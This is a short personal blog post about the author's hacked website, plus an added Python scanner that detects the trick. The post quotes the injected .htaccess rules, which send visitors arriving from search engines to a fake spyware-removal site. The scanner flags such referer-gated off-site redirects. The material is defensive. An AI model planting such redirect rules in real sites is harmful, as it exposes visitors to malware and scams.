Clock Cleaners

We'll clean your clock for a reasonable fee. (Also well versed in wagon repair)

Monday, December 1, 2008

So this website was compromised

So this website (mattmullen.net) was compromised recently, oddly enough. I guess those hackers were just too excited by the prospect of my traffic at upwards of 2 hits per day redirected to their malware site. It's quite a honeypot.

Anyway, here's all they did: they injected an .htaccess in the root with the following data:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://[IP Address of malware site]/in.html?s=xx [R,L]

Which made my site accessible by direct link or bookmark, but you couldn't click-through from a major search engine without getting redirected to a fake spyware-removal app.

I've replaced the bad files, changed my passwords, and scanned all my machines for malware (0 hits), so my best guess is that they somehow got my ftp address, or compromised the host company and infected many of their users.
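
A defender's check for the pattern above, as an added example that is not part of the original post: this Python function scans .htaccess text for a RewriteRule that sends visitors to a foreign host only when Referer conditions match. The function name, the own_hosts parameter, and the sample hosts 192.0.2.10 and example.org are assumptions made for illustration.

```python
import re

# RewriteCond that tests the Referer header; captures the condition pattern.
COND_REFERER = re.compile(r'^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)', re.I)
# RewriteRule; captures the substitution (its second argument).
RULE = re.compile(r'^\s*RewriteRule\s+\S+\s+(\S+)', re.I)
# An absolute URL as the substitution makes mod_rewrite redirect to that host.
EXTERNAL = re.compile(r'^https?://([^/:\s]+)', re.I)

def find_referer_redirects(htaccess_text, own_hosts=()):
    """Flag Referer-gated rules that redirect off-site (own_hosts: lowercase names)."""
    findings, referer_conds = [], []
    for lineno, raw in enumerate(htaccess_text.splitlines(), 1):
        cond = COND_REFERER.match(raw)
        if cond:
            referer_conds.append(cond.group(1))
            continue
        rule = RULE.match(raw)
        if not rule:
            continue
        ext = EXTERNAL.match(rule.group(1))
        if ext and referer_conds and ext.group(1).lower() not in own_hosts:
            findings.append({'line': lineno, 'host': ext.group(1),
                             'referers': list(referer_conds)})
        referer_conds = []  # conditions only apply to the next RewriteRule
    return findings

# Constructed sample modelled on the injected file; 192.0.2.10 is a placeholder.
INJECTED = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://192.0.2.10/in.html?s=xx [R,L]
"""

# Constructed benign sample: hotlink protection tests Referer but stays on-site.
BENIGN = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^https?://(www[.])?example[.]org [NC]
RewriteRule [.](jpg|png)$ - [F]
"""

if __name__ == '__main__':
    for f in find_referer_redirects(INJECTED):
        print(f"line {f['line']}: referer-gated redirect to {f['host']}")
```

Run against every .htaccess under the web root, this catches the case described above where the site looks normal on a direct visit and only misbehaves for search-engine click-throughs.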
